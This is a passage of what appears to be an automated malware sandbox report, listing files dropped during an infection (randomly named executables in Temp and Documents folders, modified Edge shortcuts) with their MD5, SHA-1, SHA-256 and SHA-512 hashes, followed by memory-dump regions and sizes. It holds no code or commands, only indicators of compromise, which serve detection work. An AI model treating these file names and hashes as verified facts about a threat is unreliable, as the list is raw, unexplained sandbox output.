SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeMD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exeMD5
d724170a0c6b106beffded4cad9178d6
SHA1fc3786717156c791429cd3637557fe118db278c5
SHA256f5b762cf3572fe83325ebf51fd50c04cfdfd120e267d8c2fa1b618d47e6529eb
SHA512fd88e581854c7be4f4ba3a62c5b4365df06f8ddf04fb68b4bd24bf8d373b4f9282e09002dc66ab64664cabe4cf7069e7283d9ee6da803db2c0f7b16faf2b1191
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exeMD5
d724170a0c6b106beffded4cad9178d6
SHA1fc3786717156c791429cd3637557fe118db278c5
SHA256f5b762cf3572fe83325ebf51fd50c04cfdfd120e267d8c2fa1b618d47e6529eb
SHA512fd88e581854c7be4f4ba3a62c5b4365df06f8ddf04fb68b4bd24bf8d373b4f9282e09002dc66ab64664cabe4cf7069e7283d9ee6da803db2c0f7b16faf2b1191
-
C:\Users\Admin\AppData\Local\Temp\pub2.exeMD5
124ed305e6d8fb2e1bb1df1149d822db
SHA1f4abd8ea4c25df0255a2c50295dab59d3e05dcb4
SHA2564b8c39d5c8efd8414551f2b154f494f76ab507a8b696d860e03896e04b676345
SHA512f7a47ee7c2b6826fd632464ac2edd3003ff7ef14eaafbaf9370af6fa163df63cee284c8cd873a74ca93a216877cdcb1618273189ef33308cdd54f7920d67bd89
-
C:\Users\Admin\AppData\Local\Temp\pub2.exeMD5
124ed305e6d8fb2e1bb1df1149d822db
SHA1f4abd8ea4c25df0255a2c50295dab59d3e05dcb4
SHA2564b8c39d5c8efd8414551f2b154f494f76ab507a8b696d860e03896e04b676345
SHA512f7a47ee7c2b6826fd632464ac2edd3003ff7ef14eaafbaf9370af6fa163df63cee284c8cd873a74ca93a216877cdcb1618273189ef33308cdd54f7920d67bd89
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exeMD5
ecec67e025fcd37f5d6069b5ff5105ed
SHA19a5a0bed2212f47071ad27b28fe407746ecfad18
SHA25651ac8ea2c6cab10489188133a109aa4507b76ea459996173d0679d542780387c
SHA512a9d59f137e8688bcee3f1fdc327b41b7f8d836c8e4753e1e9887e03a7c97ecfb851e9d88460f1003970fbaf8638eaa7dd94eb5875a30f51b2c2e7a20a1b51e33
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exeMD5
ecec67e025fcd37f5d6069b5ff5105ed
SHA19a5a0bed2212f47071ad27b28fe407746ecfad18
SHA25651ac8ea2c6cab10489188133a109aa4507b76ea459996173d0679d542780387c
SHA512a9d59f137e8688bcee3f1fdc327b41b7f8d836c8e4753e1e9887e03a7c97ecfb851e9d88460f1003970fbaf8638eaa7dd94eb5875a30f51b2c2e7a20a1b51e33
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnkMD5
9bd4deca2d33f82efaf13977175c0687
SHA16e32e6e15cc53e967128e7da45df66b6ffc99791
SHA25674765f37cec9cdfef47e6b6266361b9ab99b5b33c1ccb929a43bb3f0d9c78ffb
SHA51209f1a2f51458ebb7ec7e3b5184cf792b8013fa35578aeebd4ce64fcb536d616325c8cc54956620ba18259515a4466ff0bd1426fab41dfb4a5dff4e0e63d15b35
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkMD5
070222fff6d4bcde0a0960faf27d6aa8
SHA1a0b0d18422f658e6a2238cfdb3157430a9e91b27
SHA256610f66f456db5065fdf6696ebfb6f29a759921cfaab7737bac92294356e0ff1e
SHA5129639ad8907bc4ab21e981e784d936b6ba523efbfee6251dfea6bcf527ab25224b406fd870f3530e1e6a7ba2e8276bd6cf802a81d867df70562fc888876543ec4
-
C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exeMD5
a91fb4ad2a4377eacf8f0ef8d52727c5
SHA1fe10dafb53561d0a606d64f783286597d49a7ba6
SHA256356b02d083bfe02dc53ff918bcef12a8fd44686b7ed05f66d7569659c1ad2dc9
SHA512deebb562da2e8e2bf09232b763558423da019bf3e47109979ba0bc521e8c6a700312c4410f8c16be3a02b16b261f40bd2bcf3860bf41ccaa45b94310935a86f0
-
C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exeMD5
a91fb4ad2a4377eacf8f0ef8d52727c5
SHA1fe10dafb53561d0a606d64f783286597d49a7ba6
SHA256356b02d083bfe02dc53ff918bcef12a8fd44686b7ed05f66d7569659c1ad2dc9
SHA512deebb562da2e8e2bf09232b763558423da019bf3e47109979ba0bc521e8c6a700312c4410f8c16be3a02b16b261f40bd2bcf3860bf41ccaa45b94310935a86f0
-
C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exeMD5
00ecdf7f62876e4250d39747d1cb645c
SHA102fcac0671c1a1cf6fad778e0212852e9567622d
SHA25663085f01b1d4e08b35018fd7e41a59d7143f51400e7e215afc9bf3718352f950
SHA512d82a12d9a126bb31722f8de876552ce9df743f351cee09999dcd70f1f27c137e38556d1594af445816fc802af2ec137598c76c88009ae8c62e08d239bd77f6a2
-
C:\Users\Admin\Documents\NmgYea8Ed5HpZgfZ6I_SyvV4.exeMD5
f625f97e0bc66bece1c0fc6dd4277f73
SHA1311eb75ae5db1f700954f606bfe7edae6b4cff5e
SHA256c0e844159ad8ec1e6a6edd94f5da2d5be41ee01a16400c024024d212f3f99584
SHA5121d070b00cc1f84f5044408a975f23fdd9d338de634ab738346335e15da997b570233560274ebf698f5c0f8c7269880b45b3aff6f241fb3c5b35662609116e3a1
-
C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exeMD5
6ad0ed3f45e1e29e3899c7c7be87816d
SHA1318c16a34ed6fb5f5fe8034b000ccc66fa38206b
SHA256dd332eaa29f31b1ab7066a231fc87376208766088f5c43c7f19ed41c51439cfa
SHA512ee1139cf3a85875d46b54dc1b21d3f67b0846e2e735c88c59b2a7df348c047d76c5c08e459eef0d99af7b46b8f5cab7ea940d3646b0f827e7a8b4031c86af7dd
-
C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exeMD5
6ad0ed3f45e1e29e3899c7c7be87816d
SHA1318c16a34ed6fb5f5fe8034b000ccc66fa38206b
SHA256dd332eaa29f31b1ab7066a231fc87376208766088f5c43c7f19ed41c51439cfa
SHA512ee1139cf3a85875d46b54dc1b21d3f67b0846e2e735c88c59b2a7df348c047d76c5c08e459eef0d99af7b46b8f5cab7ea940d3646b0f827e7a8b4031c86af7dd
-
C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exeMD5
9dc243113052bcdd6add2f3ee2535b7b
SHA18ed4fc1f0cc794771796b6dd569bbcec60f7e434
SHA256dab47d33a292ab6b5b8aa525857160906629f9fd1b8dc1e3a37f62247d7ce8e0
SHA512910fc7dec43a31d45390ad60f3d3994303f9500dcdf7056d84204c0388e0fde250b5ade4a29ed16f110a37ff0c41c72c13337a75b1ea85a2ae31624a11cbf691
-
C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exeMD5
9dc243113052bcdd6add2f3ee2535b7b
SHA18ed4fc1f0cc794771796b6dd569bbcec60f7e434
SHA256dab47d33a292ab6b5b8aa525857160906629f9fd1b8dc1e3a37f62247d7ce8e0
SHA512910fc7dec43a31d45390ad60f3d3994303f9500dcdf7056d84204c0388e0fde250b5ade4a29ed16f110a37ff0c41c72c13337a75b1ea85a2ae31624a11cbf691
-
C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exeMD5
f102d83fd4b5851708150b000bf3e469
SHA1635c5e44193f6f7fb25698a5ca670a18b337c266
SHA2569619a526572bd760a66bbd15abb6cec754256f89826e7ac2bf01281a1e2ad72c
SHA5123e7616d5c7878eda89ed2069407ed6a5191c4edafc8ac950da81a88f58254727812e4acb876f55eb8322b771b4ba7a488576576bf80bb81f5b82babe271d6af3
-
C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exeMD5
f102d83fd4b5851708150b000bf3e469
SHA1635c5e44193f6f7fb25698a5ca670a18b337c266
SHA2569619a526572bd760a66bbd15abb6cec754256f89826e7ac2bf01281a1e2ad72c
SHA5123e7616d5c7878eda89ed2069407ed6a5191c4edafc8ac950da81a88f58254727812e4acb876f55eb8322b771b4ba7a488576576bf80bb81f5b82babe271d6af3
-
\??\pipe\LOCAL\crashpad_212_OJHHMPOFWGITTRORMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4504_NTFLEHUSPNMWNDWZMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1300-421-0x0000000006660000-0x0000000006C04000-memory.dmpFilesize
5.6MB
-
memory/1300-408-0x0000000000610000-0x0000000000ABC000-memory.dmpFilesize
4.7MB
-
memory/1300-398-0x0000000000610000-0x0000000000ABC000-memory.dmpFilesize
4.7MB
-
memory/1300-452-0x0000000006C80000-0x0000000006CE6000-memory.dmpFilesize
408KB
-
memory/1300-443-0x0000000006240000-0x0000000006290000-memory.dmpFilesize
320KB
-
memory/1300-451-0x0000000007140000-0x000000000766C000-memory.dmpFilesize
5.2MB
-
memory/1300-447-0x0000000072CC0000-0x0000000073470000-memory.dmpFilesize
7.7MB
-
memory/2912-166-0x0000000002E23000-0x0000000002E2C000-memory.dmpFilesize
36KB
-
memory/2912-155-0x0000000002E23000-0x0000000002E2C000-memory.dmpFilesize
36KB
-
memory/2912-167-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/2912-178-0x0000000000400000-0x0000000002BF0000-memory.dmpFilesize
39.9MB
-
memory/2948-450-0x0000000003B20000-0x00000000042DE000-memory.dmpFilesize
7.7MB
-
memory/3032-196-0x0000000008770000-0x0000000008785000-memory.dmpFilesize
84KB
-
memory/3112-446-0x0000000002150000-0x00000000021B0000-memory.dmpFilesize
384KB
-
memory/3944-206-0x0000000003530000-0x0000000003540000-memory.dmpFilesize
64KB
-
memory/3944-212-0x0000000003690000-0x00000000036A0000-memory.dmpFilesize
64KB
-
memory/3944-220-0x0000000004230000-0x0000000004238000-memory.dmpFilesize
32KB
-
memory/3944-218-0x0000000004170000-0x0000000004178000-memory.dmpFilesize
32KB
-
memory/3944-219-0x0000000004190000-0x0000000004198000-memory.dmpFilesize
32KB
-
memory/3944-224-0x0000000004190000-0x0000000004198000-memory.dmpFilesize
32KB
-
memory/3944-223-0x0000000004190000-0x0000000004198000-memory.dmpFilesize
32KB
-
memory/3944-142-0x0000000000400000-0x000000000063D000-memory.dmpFilesize
2.2MB
-
memory/3944-222-0x0000000004390000-0x0000000004398000-memory.dmpFilesize
32KB
-
memory/3944-221-0x0000000004370000-0x0000000004378000-memory.dmpFilesize
32KB
-
memory/4076-459-0x0000000000170000-0x00000000004A7000-memory.dmpFilesize
3.2MB
-
memory/4076-456-0x0000000002AF0000-0x0000000002B36000-memory.dmpFilesize
280KB
-
memory/4700-431-0x00000000051C0000-0x00000000051C1000-memory.dmpFilesize
4KB
-
memory/4700-405-0x0000000000DB0000-0x0000000001112000-memory.dmpFilesize
3.4MB
-
memory/4700-379-0x0000000000DB0000-0x0000000001112000-memory.dmpFilesize
3.4MB
-
memory/4700-387-0x0000000077310000-0x0000000077525000-memory.dmpFilesize
2.1MB
-
memory/4700-382-0x0000000000660000-0x0000000000661000-memory.dmpFilesize
4KB
-
memory/4700-453-0x0000000072CC0000-0x0000000073470000-memory.dmpFilesize
7.7MB
-
memory/4700-403-0x0000000000DB0000-0x0000000001112000-memory.dmpFilesize
3.4MB
-
memory/4700-427-0x00000000051D0000-0x00000000052DA000-memory.dmpFilesize
1.0MB
-
memory/4700-377-0x0000000000DB0000-0x0000000001112000-memory.dmpFilesize
3.4MB
-
memory/4700-432-0x00000000050E0000-0x000000000511C000-memory.dmpFilesize
240KB
-
memory/4700-386-0x0000000000C80000-0x0000000000C81000-memory.dmpFilesize
4KB
-
memory/4700-388-0x0000000000DB0000-0x0000000001112000-memory.dmpFilesize
3.4MB
-
memory/4700-385-0x0000000000D40000-0x0000000000D86000-memory.dmpFilesize
280KB
-
memory/4940-390-0x0000000000770000-0x00000000007D0000-memory.dmpFilesize
384KB
-
memory/4972-156-0x0000000000AD3000-0x0000000000AEF000-memory.dmpFilesize
112KB
-
memory/4972-161-0x0000000000400000-0x00000000009B8000-memory.dmpFilesize
5.7MB
-
memory/4972-160-0x00000000001C0000-0x00000000001F0000-memory.dmpFilesize
192KB
-
memory/4972-135-0x0000000000AD3000-0x0000000000AEF000-memory.dmpFilesize
112KB
-
memory/4992-171-0x00007FFE87210000-0x00007FFE87211000-memory.dmpFilesize
4KB
-
memory/4996-138-0x0000000000840000-0x0000000000870000-memory.dmpFilesize
192KB
-
memory/4996-149-0x000000001B650000-0x000000001B652000-memory.dmpFilesize
8KB
-
memory/4996-141-0x00007FFE67350000-0x00007FFE67E11000-memory.dmpFilesize
10.8MB
-
memory/5224-420-0x0000000002150000-0x00000000021B0000-memory.dmpFilesize
384KB
-
memory/5232-426-0x0000000004C70000-0x0000000004C82000-memory.dmpFilesize
72KB
-
memory/5232-395-0x0000000000420000-0x0000000000440000-memory.dmpFilesize
128KB
-
memory/5232-422-0x00000000051D0000-0x00000000057E8000-memory.dmpFilesize
6.1MB
-
memory/5232-433-0x0000000004BB0000-0x00000000051C8000-memory.dmpFilesize
6.1MB
-
memory/5232-399-0x0000000072CC0000-0x0000000073470000-memory.dmpFilesize
7.7MB
-
memory/5240-416-0x0000000000890000-0x00000000008F0000-memory.dmpFilesize
384KB
-
memory/5256-463-0x0000000004020000-0x00000000047DE000-memory.dmpFilesize
7.7MB
-
memory/5264-394-0x0000000000E80000-0x0000000000E81000-memory.dmpFilesize
4KB
-
memory/5264-402-0x0000000000EC0000-0x0000000001205000-memory.dmpFilesize
3.3MB
-
memory/5264-413-0x0000000000EC0000-0x0000000001205000-memory.dmpFilesize
3.3MB
-
memory/5264-434-0x0000000005CC0000-0x0000000005CC1000-memory.dmpFilesize
4KB
-
memory/5264-414-0x0000000072CC0000-0x0000000073470000-memory.dmpFilesize
7.7MB
-
memory/5264-411-0x0000000000EA0000-0x0000000000EA1000-memory.dmpFilesize
4KB
-
memory/5264-415-0x0000000000EC0000-0x0000000001205000-memory.dmpFilesize
3.3MB
-
memory/5264-393-0x0000000000EC0000-0x0000000001205000-memory.dmpFilesize
3.3MB
-
memory/5264-391-0x0000000001350000-0x0000000001396000-memory.dmpFilesize
280KB
-
memory/5272-417-0x0000000002150000-0x00000000021B0000-memory.dmpFilesize
384KB
-
memory/5444-457-0x0000000004CE3000-0x0000000004CE4000-memory.dmpFilesize
4KB
-
memory/5444-424-0x0000000072CC0000-0x0000000073470000-memory.dmpFilesize
7.7MB
-
memory/5444-449-0x000000000055A000-0x000000000055C000-memory.dmpFilesize
8KB
-
memory/5444-396-0x00000000008D0000-0x00000000008E8000-memory.dmpFilesize
96KB
-
memory/5444-455-0x0000000004CE2000-0x0000000004CE3000-memory.dmpFilesize
4KB
-
memory/5444-460-0x0000000004CE4000-0x0000000004CE5000-memory.dmpFilesize
4KB
-
memory/5444-454-0x0000000004CE0000-0x0000000004CE1000-memory.dmpFilesize
4KB
-
memory/5620-430-0x0000000000840000-0x0000000000884000-memory.dmpFilesize
272KB
-
memory/5620-425-0x0000000000810000-0x0000000000837000-memory.dmpFilesize
156KB
-
memory/5620-428-0x0000000000400000-0x0000000000492000-memory.dmpFilesize
584KB
-
memory/5936-442-0x0000000000730000-0x0000000000A6C000-memory.dmpFilesize
3.2MB
-
memory/5936-439-0x0000000000730000-0x0000000000A6C000-memory.dmpFilesize
3.2MB
-
memory/5936-441-0x0000000000730000-0x0000000000A6C000-memory.dmpFilesize
3.2MB
-
memory/5936-448-0x0000000002B20000-0x0000000002B22000-memory.dmpFilesize
8KB
-
memory/5936-436-0x00000000029D0000-0x0000000002A13000-memory.dmpFilesize
268KB
-
memory/6032-429-0x0000000000080000-0x000000000009E000-memory.dmpFilesize
120KB
-
memory/6032-445-0x0000000072CC0000-0x0000000073470000-memory.dmpFilesize
7.7MB